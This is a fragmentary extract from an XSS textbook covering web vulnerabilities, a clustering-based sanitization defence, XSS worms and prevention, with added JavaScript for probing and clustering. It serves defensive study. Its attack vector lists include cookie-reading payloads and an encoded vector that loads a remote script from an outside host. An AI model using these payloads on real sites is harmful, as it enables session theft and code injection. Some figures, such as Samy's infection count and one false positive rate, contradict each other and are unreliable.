Cross-Site Scripting Attacks
Security, Privacy, and Trust in Mobile Communications
Series Editor: Brij B. Gupta
Preface
November 2019
B. B. Gupta
Pooja Chaudhary
Security Flaws in Web Applications
[Figure: request from the client machine to the web server, and the response produced by the application logic software]
[16]. Figure 1.2 shows that almost 44% of web applications are designed using PHP as the base language, 26% are based on ASP.NET, and so on. The "Other" category includes languages like Python, Ruby, etc. It is also evident that PHP and ASP.NET are the most widely used technologies for web application development today. Even though web applications play a crucial role in extending a business, they contain hidden flaws that an attacker might exploit. These flaws may be categorized as high, medium, or low severity depending on their impact on the web application if the attacker exploits them. Figure 1.3 shows the average number of vulnerabilities at each severity level identified per web application developed in one of the programming languages PHP, ASP.NET, Java, and others [15].
FIGURE 1.7 Vulnerabilities detection rate SAST vs. DAST (in %).
to the attacker to exploit the latent flaws. Figure 1.7 shows that a major portion of the security errors was found by dynamic testing as compared to static testing [23]: the percentage of vulnerabilities identified and fixed during dynamic testing is larger than with static testing, whether they are of critical, high, or medium severity. (The two approaches find different classes of flaws, so the figure reports what each method detected in that survey rather than a general ranking of the methods.)
Rapid growth of more innovative and complex application development techniques produces complex applications and makes identifying and resolving vulnerabilities sharply harder. Insecure web applications affect every domain, including e-commerce, manufacturing, IT, and the public sector. Since the risk posed by exploitation of latent vulnerabilities in web applications can vary from low to high, it is vital to resolve them early and accurately. Another report, published by the Open Web Application Security Project (OWASP) [18], highlights the ten most common vulnerabilities embedded in web applications across almost every sector. Figure 1.8 lists these top 10 vulnerabilities.
These vulnerabilities exist for many reasons, including insecure coding, use of modular programming without security testing of components, use of default configurations,
REFERENCES
1. Apache Software Foundation. (2019). Apache web server. [online]
Available at: https://httpd.apache.org/docs/2.4/howto/.
2. Babiker, M., Karaarslan, E., & Hoscan, Y. (2018, March). Web
application attack detection and forensics: A survey. In 2018 6th
International Symposium on Digital Forensic and Security (ISDFS)
(pp. 1–6). IEEE.
3. Brunil, D., Romero, M., Haddad, H. M., & Molero, A. E. (2009).
A methodological tool for asset identification in web applications.
In IEEE Fourth International Conference on Software Engineering
Advances (pp. 413–418).
4. Chaudhary, P., & Gupta, B. B. (2018). Plague of cross-site script-
ing on web applications: A review, taxonomy and challenges.
International Journal of Web Based Communities, 14(1), 64–93.
5. Gupta, B., Agrawal, D. P., & Yamaguchi, S. (eds.). (2016). Handbook
of Research on Modern Cryptographic Solutions for Computer and
Cyber Security. IGI Global.
6. Gupta, B. B. (ed.). (2018). Computer and Cyber Security. Principles,
Algorithm, Applications, and Perspectives. CRC Press.
7. Gupta, B. B., Gupta, S., & Chaudhary, P. (2017). Enhancing the
browser-side context-aware sanitization of suspicious HTML5
code for halting the DOM-based XSS vulnerabilities in cloud.
International Journal of Cloud Applications and Computing
(IJCAC), 7(1), 1–31.
8. Gupta, B. B., Gupta, S., Gangwar, S., Kumar, M., & Meena, P. K.
(2015). Cross-site scripting (XSS) abuse and defense: Exploitation
on several testing bed environments and its defense. Journal of
Information Privacy and Security, 11(2), 118–136.
Security Challenges in Social Networking
Taxonomy and Statistics
2.1 INTRODUCTION
Although social media has emerged within a short span of time, it
has attracted millions of internet users and has become the most
popular use of the internet globally. With the development of the web as a content-based platform, social media is the only digital place that revolves around user-generated information. The Online Social Network (OSN) has emerged as a logical location for its billions of users, where they can expand their relationship boundaries across the globe [4, 36]. It facilitates socialization by enabling new links with loved ones or restoring lost ones. Moreover, organizations can employ this platform to enlarge their business through advertising, and for entertainment, education, and so on. The most prominent services provided by OSNs are illustrated in Figure 2.1.
the main attractions for attackers are: (1) the high concentration of its topology, (2) the use of enhanced and advanced web development technologies like AJAX and JavaScript for more interactive applications, and (3) a stronger trust relationship among nodes than in general networks. Figure 2.5 shows the number of vulnerabilities identified on some of the social media platforms.
These hidden vulnerabilities not only affect the usage and popularity of social media but also affect users' privacy and security. Recently, in 2017, hackers attacked one of the highly used
REFERENCES
1. Al-Qurishi, M., Al-Rakhami, M., Alamri, A., Alrubaian, M.,
Rahman, S. M. M., & Hossain, M. S. (2017). Sybil defense techniques
in online social networks: A survey. IEEE Access, 5, 1200–1219.
2. Almomani, A., Gupta, B. B., Wan, T. C., Altaher, A., & Manickam,
S. (2013). Phishing dynamic evolving neural fuzzy framework
for online detection zero-day phishing email. arXiv Preprint
ArXiv:1302.0629.
3. Benenson, Z., Gassmann, F., & Landwirth, R. (2017, April).
Unpacking spear phishing susceptibility. In International
Conference on Financial Cryptography and Data Security (pp. 610–
627). Springer, Cham.
4. Boulianne, S. (2019). Revolution in the making? Social media
effects across the globe. Information, Communication and Society,
22(1), 39–54.
5. Cai, Z., He, Z., Guan, X., & Li, Y. (2016). Collective data-saniti-
zation for preventing sensitive information inference attacks in
social networks. IEEE Transactions on Dependable and Secure
Computing, 15(4), 577–590.
6. Chaudhary, P., Gupta, B. B., & Gupta, S. (2016, March). Cross-
site scripting (XSS) worms in Online Social Network (OSN):
Taxonomy and defensive mechanisms. In 2016 3rd International
Conference on Computing for Sustainable Global Development
(INDIACom) (pp. 2131–2136). IEEE.
7. Ferrara, E., Varol, O., Davis, C., Menczer, F., & Flammini, A.
(2016). The rise of social bots. Communications of the ACM, 59(7),
96–104.
8. Fire, M., Goldschmidt, R., & Elovici, Y. (2014). Online social net-
works: Threats and solutions. IEEE Communications Surveys and
Tutorials, 16(4), 2019–2036.
9. Gupta, B. B. (ed.). (2018). Computer and Cyber Security: Principles,
Algorithm, Applications, and Perspectives. CRC Press.
10. Gupta, B. B., Gupta, S., & Chaudhary, P. (2017). Enhancing the
browser-side context-aware sanitization of suspicious HTML5 code
for halting the DOM-based XSS vulnerabilities in cloud. International
Journal of Cloud Applications and Computing, 7(1), 1–31.
11. Gupta, B. B., & Sheng, Q. Z. (eds.). (2019). Machine Learning for
Computer and Cyber Security: Principle, Algorithms, and Practices.
CRC Press.
12. Gupta, S., & Gugulothu, N. (2018). Secure nosql for the social net-
working and e-commerce based bigdata applications deployed in
cloud. International Journal of Cloud Applications and Computing,
8(2), 113–129.
13. Gupta, S., & Gupta, B. B. (2015). BDS: Browser dependent XSS sani-
tizer. In Handbook of Research on Securing Cloud-Based Databases
with Biometric Applications (pp. 174–191). IGI Global.
14. Gupta, S., & Gupta, B. B. (2015, May). PHP-sensor: A prototype
method to discover workfow violation and XSS vulnerabili-
ties in PHP web applications. In Proceedings of the 12th ACM
International Conference on Computing Frontiers (p. 59). ACM.
15. Gupta, S., & Gupta, B. B. (2016). JS-SAN: Defense mechanism for
HTML5‐based web applications against JavaScript code injec-
tion vulnerabilities. Security and Communication Networks, 9(11),
1477–1495.
16. Isaac, Mike, & Frenkel, Sheera. Facebook security breach exposes
accounts of 50 million users. [online] Available at: https://ww
w.nytimes.com/2018/09/28/technology/facebook-hack-data-breac
h.html
17. Jain, A. K., & Gupta, B. B. (2017). Phishing detection: Analysis of
visual similarity based approaches. Security and Communication
Networks, 2017.
18. Jiang, F., Fu, Y., Gupta, B. B., Lou, F., Rho, S., Meng, F., & Tian,
Z. (2018). Deep learning based multi-channel intelligent attack
detection for data security. IEEE Transactions on Sustainable
Computing.
19. Kamhoua, G. A., Pissinou, N., Iyengar, S. S., Beltran, J., Kamhoua,
C., Hernandez, B. L., Njilla, L., & Makki, A. P. (2017, June).
Preventing colluding identity clone attacks in online social net-
works. In 2017 IEEE 37th International Conference on Distributed
Computing Systems Workshops (ICDCSW) (pp. 187–192). IEEE.
20. Li, C., Zhang, Z., & Zhang, L. (2018). A novel authorization scheme
for multimedia social networks under cloud storage method by
using MA-CP-ABE. International Journal of Cloud Applications
and Computing, 8(3), 32–47.
21. Li, H., Chen, Q., Zhu, H., Ma, D., Wen, H., & Shen, X. S. (2017).
Privacy leakage via de-anonymization and aggregation in hetero-
geneous social networks. IEEE Transactions on Dependable and
Secure Computing.
22. Li, H., Zhu, H., Du, S., Liang, X., & Shen, X. S. (2016). Privacy leakage of
location sharing in mobile social networks: Attacks and defense. IEEE
Transactions on Dependable and Secure Computing, 15(4), 646–660.
23. Liu, J., Tao, Y., & Bai, Q. (2016, August). Towards exposing cyber-
stalkers in online social networks. In Pacific Rim International
Conference on Artificial Intelligence (pp. 763–770). Springer, Cham.
24. Mocktoolah, A., & Khedo, K. K. (2015, December). Privacy
challenges in proximity based social networking: Techniques
& solutions. In 2015 International Conference on Computing,
Communication and Security (ICCCS) (pp. 1–8). IEEE.
25. Olakanmi, O. O., & Dada, A. (2019). An efficient privacy-pre-
serving approach for secure verifiable outsourced computing on
untrusted platforms. International Journal of Cloud Applications
and Computing, 9(2), 79–98.
26. Patel, P., Kannoorpatti, K., Shanmugam, B., Azam, S., & Yeo, K.
C. (2017, January). A theoretical review of social media usage by
cyber-criminals. In 2017 International Conference on Computer
Communication and Informatics (ICCCI) (pp. 1–6). IEEE.
27. Pew Research Report Pew Research Center. (2018). Social Media
Use in 2018. [online] Available at: https://www.pewresearch.org/in
ternet/2018/03/01/social-media-use-in-2018/.
28. Rathore, S., Sharma, P. K., Loia, V., Jeong, Y. S., & Park, J. H. (2017).
Social network security: Issues, challenges, threats, and solutions.
Information Sciences, 421, 43–69.
29. Sahoo, S. R., & Gupta, B. B. (2019). Classification of various attacks
and their defence mechanism in online social networks: A survey.
Enterprise Information Systems, 13(6), 832–864.
30. Social media active users. [online] Available at: https://www.sta
tista.com/statistics/272014/global-social-networks-ranked-by
-number-of-users/.
31. Squicciarini, A., Rajtmajer, S., Liu, Y., & Griffin, C. (2015, August).
Identification and characterization of cyberbullying dynamics in
an online social network. In Proceedings of the 2015 IEEE/ACM
International Conference on Advances in Social Networks Analysis
and Mining 2015 (pp. 280–285). ACM.
32. Tian, Y., Yuan, J., & Yu, S. (2016, October). SBPA: Social behav-
ior based cross social network phishing attacks. In 2016 IEEE
Conference on Communications and Network Security (CNS) (pp.
366–367). IEEE.
Fundamentals of Cross-Site Scripting (XSS) Attack
Step 2: Now, enter any string into the identified field and submit it. Search for this string in the source code of the returned web page.
Step 3: Check whether the entered string is displayed on the web page as the result of step 2.
Step 5: If the web page does not employ any sanitization technique, the malicious script will be executed in the browser. After its successful execution, a dialog box will pop up, reflecting the XSS attack in the message body of the box.
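The procedure above can be automated. The following is an added example, not code from the book: it submits a probe string carrying a unique token (steps 2 and 3), searches the returned page source for it, and reports whether the probe came back raw (exploitable), entity-encoded (sanitized), or not at all. The two page-rendering functions are constructed stand-ins for a search page that echoes a query parameter, one vulnerable and one hardened, so the script runs offline; their names and the token are assumptions.

```javascript
// Added example (not from the book): automate the reflected-XSS probe test.
// A probe string is submitted, the response body is searched for it, and the
// result is classified by whether the probe came back raw, HTML-encoded, or
// not at all. The "pages" are constructed stand-ins that echo a parameter.

// Minimal HTML entity encoder: the sanitization a correct server applies
// before placing user input into an HTML text or attribute context.
function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Constructed stand-ins (hypothetical) for two versions of a search page.
function vulnerableSearchPage(q) {
  return `<html><body><h1>Results for: ${q}</h1></body></html>`;
}
function hardenedSearchPage(q) {
  return `<html><body><h1>Results for: ${htmlEncode(q)}</h1></body></html>`;
}

// Steps 2/3: does the probe appear in the page source, and in what form?
// 'raw'     : reflected unencoded, so the markup is live (step 5 fires)
// 'encoded' : reflected but entity-escaped, so it renders as text
// 'absent'  : not reflected at all (stored elsewhere, filtered, or dropped)
function classifyReflection(body, probe) {
  if (body.includes(probe)) return 'raw';
  if (body.includes(htmlEncode(probe))) return 'encoded';
  return 'absent';
}

// A unique token keeps the search from matching pre-existing page content.
function makeProbe(token) {
  return `<script>alert("${token}")</script>`;
}

function testEndpoint(renderPage, token) {
  const probe = makeProbe(token);
  const body = renderPage(probe);
  const verdict = classifyReflection(body, probe);
  return { verdict, exploitable: verdict === 'raw' };
}

// Usage:
const TOKEN = 'xss-probe-7f3a'; // constructed
console.log(testEndpoint(vulnerableSearchPage, TOKEN)); // { verdict: 'raw', exploitable: true }
console.log(testEndpoint(hardenedSearchPage, TOKEN));   // { verdict: 'encoded', exploitable: false }
```

A 'raw' verdict means the markup survived into the page; whether it executes still depends on where it landed (inside an attribute or a script string it needs a different payload) and on any Content Security Policy the page sends, which is why a confirmed pop-up, as in step 5, remains the final check.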
code into the server just once and then affects a large number of benign users if the sanitization mechanism is improper. Figure 3.1 depicts the scenario of a persistent XSS attack.
CHAPTER 4
Clustering and Context-Based Sanitization Mechanism for Defending against XSS Attack
4.1 INTRODUCTION
When we think about the internet, it means a market for several web applications that may correspond to different sectors or businesses such as e-commerce, manufacturing, telecom, education, and many more [10, 12]. However, the most dominant and popular web application is the social network. Social media has taken the usage of the internet to another level. Now, everyone is connected to their loved ones either personally or professionally via a single network. But not every person is good; the network also attracts malicious actors like fraudsters, attackers, and online predators. Social media has become a platform hosting several vulnerabilities and attacks [24, 30]. XSS is a highly exploited vulnerability that can be used to trigger other dangerous attacks like DoS. Therefore, researchers have developed techniques for mitigating XSS [5, 6, 11, 13, 19]. Input validation and sanitization are considered the first and foremost defensive measures for mitigating the effects of XSS worms on web application platforms [5]. Nevertheless, these techniques incur high performance overhead. Therefore, this chapter presents an approach based on clustering and context-based sanitization to thwart XSS attacks on social media. This approach builds on some basic mechanisms, so the following subsections discuss the preliminaries required to understand the working of the proposed approach.
4.1.1 Views
Views can be understood as the working interface presented to the current user of the web application for the requested action. Technically, a view is a sandboxed thread that implements a portion of the web application; at the browser end, it appears as the web page or a part of it. The sandbox isolates the view from the other processes running on the system.
User ID | Privileges
<1>     | Read, Write, Update
style sheet, script, anchors, href, etc. These contexts may be used by the attacker to launch an XSS attack.
• When the server receives the request from the user, it is forwarded to the session manager. Here, it is mapped to the stored session corresponding to the user's cookie information (i.e., the session identifier issued at login, which stands in for the user's credentials).
• The request is processed to check whether it alters the server content or not, for example, a request to post a comment. If it does not modify the content, the server generates the static web page and returns it to the browser.
Figure 4.3 presents the working fow chart of the proposed approach.
<script>alert(48a$bc);</script>
Threshold (α) := 0;
Start
  C_Rep ← NULL;
  V_X ← 0;
  Compare(A_X, A_X+1);
  V_X ← Levenshtein_distance(A_X, A_X+1);
  If (V_X > α)
    C_Rep ← T ∪ C_Rep;
  End If
  Else
  End Else
  Return C_Rep;
End
<script>alert(48xv&ez);</script>
<script>alert(48-S-);</script>
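The clustering step above compares consecutive attack vectors by Levenshtein distance and records a new cluster representative whenever the distance exceeds the threshold α. The following is an added example, not the book's code, that implements that idea as a greedy single-pass clustering: each vector is compared against the representatives found so far, joins the closest cluster if the distance is within α, and otherwise becomes a new representative. The threshold value (8), the sample list and the function names are assumptions for the demo; the three `alert(48...)` variants are the vectors shown on the page.

```javascript
// Added example (not the book's code): cluster XSS attack vectors by edit
// distance. A vector within `alpha` edits of an existing representative joins
// that cluster; otherwise it becomes the representative of a new cluster.

// Levenshtein distance: Wagner-Fischer dynamic programme, two-row variant.
function levenshtein(a, b) {
  if (a === b) return 0;
  if (a.length === 0) return b.length;
  if (b.length === 0) return a.length;
  let prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    const cur = [i];
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      cur[j] = Math.min(prev[j] + 1,        // deletion
                        cur[j - 1] + 1,     // insertion
                        prev[j - 1] + cost); // substitution
    }
    prev = cur;
  }
  return prev[b.length];
}

// Greedy clustering. Returns [{ rep, members }], one entry per cluster;
// `rep` plays the role of C_Rep in the pseudocode above.
function clusterVectors(vectors, alpha) {
  const clusters = [];
  for (const v of vectors) {
    let best = null;
    let bestDist = Infinity;
    for (const c of clusters) {
      const d = levenshtein(v, c.rep);
      if (d < bestDist) { best = c; bestDist = d; }
    }
    if (best && bestDist <= alpha) best.members.push(v);
    else clusters.push({ rep: v, members: [v] });
  }
  return clusters;
}

// Constructed sample: the page's three alert(48...) variants plus two
// unrelated <img onerror> vectors (hypothetical).
const SAMPLE_VECTORS = [
  '<script>alert(48a$bc);</script>',
  '<script>alert(48xv&ez);</script>',
  '<script>alert(48-S-);</script>',
  '<img src=x onerror=alert(1)>',
  '<img src=y onerror=alert(2)>',
];
const ALPHA = 8; // assumed threshold for the demo

// Usage:
for (const c of clusterVectors(SAMPLE_VECTORS, ALPHA)) {
  console.log(`rep=${c.rep}  size=${c.members.length}`);
}
```

The threshold trades precision for coverage: a small α splits near-identical obfuscations into separate clusters, a large α merges unrelated vectors, so it should be tuned on a labelled vector set rather than fixed at 0 as the pseudocode initialises it.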
Start
  SCLU_Rep ← NULL;
  V_U ← ∅;
  V_S ← ∅;
  V_U ← untrusted-variable(T_I);
  C_I ← Context(V_U);
  V_S ← S_I(T_I);
  SR_log ← V_S ∪ SR_log;
  SCLU_Rep ← Template-generator(S_I);
  Return SCLU_Rep;
End
CSS attack vectors
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
Anchor (<A HREF>) attack vectors
<A HREF="http://ha.ckers.org@google">XSS</A>
<A HREF="http://google:ha.ckers.org">XSS</A>
<A HREF="http://google.com/">XSS</A>
<A HREF="http://www.google.com./">XSS</A>
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A>

HTML malicious event handler attack vectors
<img src=asdf onerror=alert(document.cookie)>
%22/%3E%3CBODY%20onload='document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)'%3E
<video onerror="alert(1)"><source></source></video>
<IMG SRC= onmouseover="alert('xss')">
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<IMG SRC=# onmouseover="alert('xxs')">
for all five testing platforms. This is done by dividing the number of XSS attack payloads detected by the number of malicious scripts exploited for each category of attack vectors. Figure 4.6 highlights the detection rate of the five OSN web applications with respect to the individual categories of attack vectors. It is clearly reflected in Figure 4.6 that the highest detection rate is observed on Elgg as compared to all the other OSN-based web application platforms.
False Positive Rate:
$$\mathrm{FPR} = \frac{FP}{FP + TN}$$

TABLE 4.6 Performance Analysis by Calculating F-Measure
Web Application | Total | # of TP | # of FP | # of TN | # of FN | Precision | FPR | FNR | Recall | F-Measure
Elgg | 127 | 116 | 5 | 4 | 2 | 0.958 | 0.5 | 0.016 | 0.983 | 0.970

False Negative Rate:
$$\mathrm{FNR} = \frac{FN}{FN + TP}$$

$$\mathrm{Precision} = \frac{TP}{TP + FP}$$

$$\mathrm{Recall} = \frac{TP}{TP + FN}$$

$$\text{F-Measure} = \frac{2\,TP}{2\,TP + FP + FN}$$
Statistics of XSS attack vectors detected (first test set, N_1 = 5)
# of Malicious Scripts Detected (X_i) | (X_i − μ) | (X_i − μ)^2 | Standard Deviation
122 | 0 | 0 | 2.549
125 | 3 | 9 |
120 | −2 | 4 |
119 | −3 | 9 |
124 | 2 | 4 |

$$\mu = \frac{1}{N_1}\sum_{i=1}^{N_1} X_i = 122, \qquad \sum_{i=1}^{N_1}(X_i-\mu)^2 = 26, \qquad S_1 = \sqrt{\frac{\sum_{i=1}^{N_1}(X_i-\mu)^2}{N_1-1}} = 2.549$$

TABLE 4.8 Statistics of XSS Attack Vectors Detected (second test set, N_2 = 5)
# of Malicious Scripts Detected (X_i) | (X_i − μ) | (X_i − μ)^2 | Standard Deviation
120 | 4 | 16 | 3.905
118 | 2 | 4 |
117 | 1 | 1 |
110 | −6 | 36 |
118 | 2 | 4 |

$$\mu = \frac{1}{N_2}\sum_{i=1}^{N_2} X_i = 116, \qquad \sum_{i=1}^{N_2}(X_i-\mu)^2 = 61, \qquad S_2 = \sqrt{\frac{\sum_{i=1}^{N_2}(X_i-\mu)^2}{N_2-1}} = 3.905$$
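The metrics in Table 4.6 and the mean and sample standard deviation in the two statistics tables can be recomputed from the counts the page gives. The following is an added example, not the book's code; the counts are taken from the tables above. Two checks fall out of it: the Elgg FPR recomputes to 5/(5+4) ≈ 0.556 rather than the 0.5 printed in Table 4.6, and the exact mean of the second set (120, 118, 117, 110, 118) is 116.6, which the table rounds to 116 before squaring the deviations, so the function accepts an explicit μ to reproduce the printed 3.905.

```javascript
// Added example (not the book's code): classification metrics from a confusion
// matrix (Table 4.6) and mean / sample standard deviation of detection counts
// (Tables 4.7 and 4.8), using the formulas on the page.

function metrics({ tp, fp, tn, fn }) {
  return {
    precision: tp / (tp + fp),
    recall:    tp / (tp + fn),             // equals 1 - FNR
    fpr:       fp / (fp + tn),
    fnr:       fn / (fn + tp),
    fMeasure:  (2 * tp) / (2 * tp + fp + fn),
  };
}

function mean(xs) {
  return xs.reduce((acc, x) => acc + x, 0) / xs.length;
}

// Sample standard deviation with Bessel's correction (N - 1), as in the tables.
// `mu` may be supplied to reproduce a rounded mean; by default it is exact.
function sampleStdDev(xs, mu = mean(xs)) {
  const sumSquares = xs.reduce((acc, x) => acc + (x - mu) ** 2, 0);
  return { mu, sumSquares, stdDev: Math.sqrt(sumSquares / (xs.length - 1)) };
}

// Counts from the tables above.
const ELGG = { tp: 116, fp: 5, tn: 4, fn: 2 }; // Table 4.6 row, total 127
const SET1 = [122, 125, 120, 119, 124];          // first statistics table
const SET2 = [120, 118, 117, 110, 118];          // Table 4.8

// Usage:
console.log(metrics(ELGG));
// precision 0.9587, recall 0.9831, fpr 0.5556, fnr 0.0169, fMeasure 0.9707
console.log(sampleStdDev(SET1));      // mu 122, sumSquares 26, stdDev 2.5495
console.log(sampleStdDev(SET2, 116)); // page's rounded mean: sumSquares 61, stdDev 3.9051
console.log(sampleStdDev(SET2));      // exact mean 116.6: sumSquares 59.2, stdDev 3.8471
```

With only five samples per set the standard deviation is itself uncertain, so the 2.549 versus 3.905 difference between the two sets says little about the detector; it is the per-platform confusion counts, as in Table 4.6, that support a comparison.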
REFERENCES
1. 523 XSS vectors available. [online] Available at: http://xss2.tech-
nomancie.net/vectors.
2. @XSS vector twitter account. [online] Available at: https://twitter.
com/XSSVector.
3. Aggarwal, C. C., & Zhai, C. (2012). A survey of text clustering
algorithms. In Mining Text Data (pp. 77–128). Springer, Boston,
MA.
4. Balzarotti, D., Cova, M., Felmetsger, V., Jovanovic, N., Kirda, E.,
Kruegel, C., & Vigna, G.. (2008). Saner: Composing static and
dynamic analysis to validate sanitization in web applications. In
IEEE Symposium on Security and Privacy. SP 2008 (pp. 387–401).
IEEE, Oakland, CA.
5. Chaudhary, P., & Gupta, B. B. (2018). Plague of cross-site script-
ing on web applications: A review, taxonomy and challenges.
International Journal of Web Based Communities, 14(1), 64–93.
6. Chaudhary, P., Gupta, B. B., & Gupta, S. (2019). A framework
for preserving the privacy of online users against XSS worms
on online social network. International Journal of Information
Technology and Web Engineering, 14(1), 85–111.
7. Drupal social networking site. [online] Available at: https://www.
drupal.org/download.
22. Metzler, D., Dumais, S., & Meek, C. (2007). Similarity measures
for short segments of text. In European Conference on Information
Retrieval. Springer, Berlin, Heidelberg.
23. Samuel, M., Saxena, P., & Song, D. (2011). Context-sensitive auto-
sanitization in web templating languages using type qualifiers.
In Proceedings of the 18th ACM Conference on Computer and
Communications Security (pp. 587–600). ACM.
24. Sarmah, U., Bhattacharyya, D. K., & Kalita, J. K. (2018). A sur-
vey of detection methods for XSS attacks. Journal of Network and
Computer Applications, 118, 113–143.
25. Saxena, P., Hanna, S., Poosankam, P., & Song, D. (2010). FLAX:
Systematic discovery of client-side validation vulnerabilities in
rich web applications. In NDSS Symposium.
26. Saxena, P., Molnar, D., & Livshits, B. (2011). SCRIPTGARD:
Automatic context-sensitive sanitization for large-scale legacy
web applications. In Proceedings of the 18th ACM Conference on
Computer and Communications Security (pp. 601–614). ACM,
Chicago, IL.
27. Technical attack sheet for cross site penetration tests. [online]
Available at: http://www.vulnerability-lab.com/resources/do
cuments/531.txt.
28. WordPress. [online] Available at: http://wordpress.org/.
29. XSS flter evasion cheat sheet. [online] Available at: https://ww
w.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet.
30. Zhang, Z., & Gupta, B. B. (2018). Social media security and trust-
worthiness: Overview and new direction. Future Generation
Computer Systems, 86, 914–925.
CHAPTER 5
Real-World XSS
Worms and
Handling Tools
users as possible. After many years, these worms are now spreading across all web applications that can provide a platform for XSS worms to proliferate. An XSS worm is more likely to originate in web applications with community-driven characteristics like social networking, forums, blogs, webmail, chat rooms, etc.
forces the user's browser to add Samy to the friends list by using XmlHttpRequest (XHR). The worm posts the message "Samy is my hero" on the victim's profile page and infects the user's profile with a copy of itself. In this way, the worm abused more than 1 million legitimate users of MySpace within 20 hours. Figure 5.1 depicts the number of users infected by different worms and shows that Samy is the worm with the highest infection rate [6]. The figure provides a comparative analysis of the infection rate of other worms, such as Code Red I and Code Red II, against the Samy worm.
This worm caused MySpace to shut down and fix the vulnerability. Samy gained control of over 1 million users. Just think of what could happen with control over that many accounts, grabbing many gigabits of network bandwidth from browsers that are also logged in to Gmail, bank accounts, trading markets, and so on. From this, we can estimate the effects of an XSS worm: the attacker might be able to launch a DDoS attack on a large scale.
But what makes the Samy worm propagate at such a high rate when other worms can't? Let's discuss this in detail. Other internet worms such as Code Red I propagate through the network by
FIGURE 5.2 Stages during the life cycle of the XSS worm.
classified the XSS worms into three types based on their style of infection and propagation as Exponential XSS worm, XSS Flash worm, and Linear XSS worm. Now, let’s dissect each type and delve deep into it.
efficiency depends on how fast they can spread and how many targets they infect. The attacker who develops the worm wants to infect as many users as possible because a worm could be more catastrophic if it spreads quickly. The speed of infection is proportionate to the identification of vulnerable target machines. The vulnerable machine can be recognized through scanning, but linear scanning is not sufficient. Therefore, hit-list scanning is done to gain maximum benefit. It uses a pre-compiled list of vulnerable machines. This is the main idea behind the XSS Warhol worm, also known as the XSS Flash worm. It is the fastest propagating worm on the internet, which infects almost every vulnerable machine worldwide within 15 minutes of its initiation. It is a conceptualized worm, as in reality such infection speed is not possible. The most threatening worm, i.e. the Samy worm, has infected 100,000 users within 20 hours.
In the initial phase, the attacker collects a pre-compiled list of vulnerable machines and releases the Warhol worm. So whenever this worm infects a machine, it divides the list into two parts, keeping one list with itself, and gives the other to the infected machine. This ensures scanning of all machines in the list under a minute, and the worm replicates itself on all identified machines. However, this process slows down if the number of uninfected machines is small. So permutation scanning is used, in which the already-infected machine behaves differently so that the time to re-infect can be saved. Here, all worms have the same pseudo-random permutation of the searched address space. It helps in increasing the propagation speed by reducing the re-infection effort. Finally, the attacker achieves a higher infection rate with complete scanning.
The infection accuracy of the XSS Flash worm is high because XSS worms are platform independent. It is highly likely that if one browser is exploited with a malicious code, then the others will also get infected; after all, every browser has the same functionality and displays any site with the same interface and functions.
REFERENCES
1. Burp scanner. [online] Available at: https://support.portswigger.ne
t/customer/portal/articles/1783127-using-burp-scanner.
2. Cao, Y., Yegneswaran, V., Porras, P. A., & Chen, Y. (2012).
PathCutter: Severing the self-propagation path of XSS JavaScript
worms in social web networks. In NDSS.
3. Chaudhary, P., Gupta, B. B., & Gupta, S. (2019). A framework
for preserving the privacy of online users against XSS worms
on online social network. International Journal of Information
Technology and Web Engineering, 14(1), 85–111.
4. Chaudhary, P., Gupta, S., & Gupta, B. B. (2016). Auditing defense
against XSS worms in online social network-based web applica-
tions. In Handbook of Research on Modern Cryptographic Solutions
for Computer and Cyber Security (pp. 216–245). IGI Global.
5. Faghani, M. R., & Nguyen, U. T. (2013). A study of XSS worm
propagation and detection mechanisms in online social networks.
IEEE Transactions on Information Forensics and Security, 8(11),
1815–1826.
6. Faghani, M. R., & Saidi, H. (2009). Social networks’ XSS worms.
In Proceedings of the 12th IEEE International Conference on
Computational Science and Engineering (CSE'09). IEEE.
CHAPTER 6
XSS Preventive Measures and General Practices
6.1 INTRODUCTION
Until now, we have gone through much information that is sufficient to understand the theory behind the XSS attack. From this, we can extract the fact that this vulnerability is not going away easily because there is a lack of support in majority of the tools,
6.2.1 Filtering
The root cause of the XSS (as discussed earlier) is inappropriate input filtering [10, 14]. Mainly, the user can submit some form of data to the web site in many ways, such as form submission and message posting, or through advanced methods like JSON, AJAX, XML, etc. As this is untrusted information entered by the user, it must not be processed in its raw form, as it may have serious security implications like the XSS. Thereby, the first and foremost technique to prevent an XSS attack is filtering. It means the user’s entire untrusted data must pass through a filter that filters out the harmful keywords like the <script> tag, suspicious HTML event handlers like onActivate(), onClick(), JavaScript elements, style sheet tags, and so on. There are two types of filtering that can be applied: input filtering and output filtering. Input filtering is the same as discussed earlier, i.e. removing suspicious keywords from the entered data, whereas output filtering is applied on data that is reflected back in the response web page. It basically works for the persistent XSS attack. Nevertheless, every method has its limitations. The disadvantage of this technique is that it also removes legitimate data if it matches the restricted keywords. To overcome this, the filters need to be relaxed to include the necessary tags and elements, paving the way for the hacker and attacker.
6.2.2 Escaping
Escaping or encoding is another method to prevent the XSS attack [10, 15]. It works by restricting the malicious script code from getting executed in the browser. It means the browser will treat the user input data as data and will not execute anything related to it. Therefore, if the attacker injects some illicit script code then the browser will not run it, if escaping is applied properly. Consequently, the user will remain unaffected. There are many types of encoding that can be applied to any web page. Let’s discuss each one of them.
• CSS Escaping: Style sheets can also be used for the injection purposes. Therefore, this encoding uses \HH and &\HHHH escaping format.
6.2.3 Sanitization
